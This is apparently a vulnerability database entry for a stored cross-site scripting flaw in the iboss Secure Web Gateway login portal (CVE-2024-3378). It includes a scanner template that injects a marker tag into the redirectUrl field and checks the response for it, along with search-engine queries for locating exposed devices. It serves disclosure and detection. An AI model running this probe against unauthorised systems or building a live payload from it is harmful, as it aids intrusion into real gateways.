CVE-2024-3378: iboss Secure Web Gateway - Stored Cross-Site Scripting

日期: 2025-08-01 | 影响软件: iboss Secure Web Gateway | POC: 已公开

漏洞描述

A cross-site scripting vulnerability has been found in iboss Secure Web Gateway up to version 10.1. The vulnerability affects the /login file of the Login Portal component, where manipulation of the redirectUrl parameter leads to cross-site scripting. The attack can be launched remotely and the exploit has been disclosed to the public.

PoC代码[已公开]

id: CVE-2024-3378

info:
  name: iboss Secure Web Gateway - Stored Cross-Site Scripting
  author: s4e-io
  severity: medium
  description: |
    A cross-site scripting vulnerability has been found in iboss Secure Web Gateway up to version 10.1. The vulnerability affects the /login file of the Login Portal component, where manipulation of the redirectUrl parameter leads to cross-site scripting. The attack can be launched remotely and the exploit has been disclosed to the public.
  remediation: Upgrading to version 10.2.0.160 is able to address this issue. It is recommended to upgrade the affected component.
  reference:
    - https://www.exploit-db.com/exploits/52009
    - https://github.com/modrnProph3t/CVE/blob/main/CVE-2024-3378.md
    - https://vuldb.com/?ctiid.259501
    - https://vuldb.com/?id.259501
    - https://vuldb.com/?submit.310642
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
    cvss-score: 4.3
    cve-id: CVE-2024-3378
    cwe-id: CWE-79
    epss-score: 0.03566
    epss-percentile: 0.87328
    cpe: cpe:2.3:a:iboss:secure_web_gateway:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: iboss
    product: secure_web_gateway
    shodan-query: html:"iboss-font.css"
    fofa-query: body="iboss-font.css"
    google-query: intext:"iboss-font.css"
  tags: cve,cve2024,iboss,xss,intrusive,vkev,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /user_login_submit HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        userName={{rand_base(10)}}&x={{rand_base(10)}}&action=login&redirectUrl=</{{randstr}}>

    matchers:
      - type: dsl
        dsl:
          - 'contains(header, "Login failed")'
          - 'status_code == 302'
        condition: and
        internal: true

  - raw:
      - |
        GET /login HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'contains(http_2_body, "</{{randstr}}>\"") && contains(http_2_body, "iboss,")'

      - type: status
        status:
          - 200
# digest: 490a004630440220122cca3d29600e15257acaa3bbee1f50e3b2901031be6e8960e2a67146f5db0c0220700760116af8f78613c27d66fe6e21a3e5f9a132fb1172e4ae2ea2a561dd4c2f:922c64590222798bb761d5b6d8e72950

相关漏洞推荐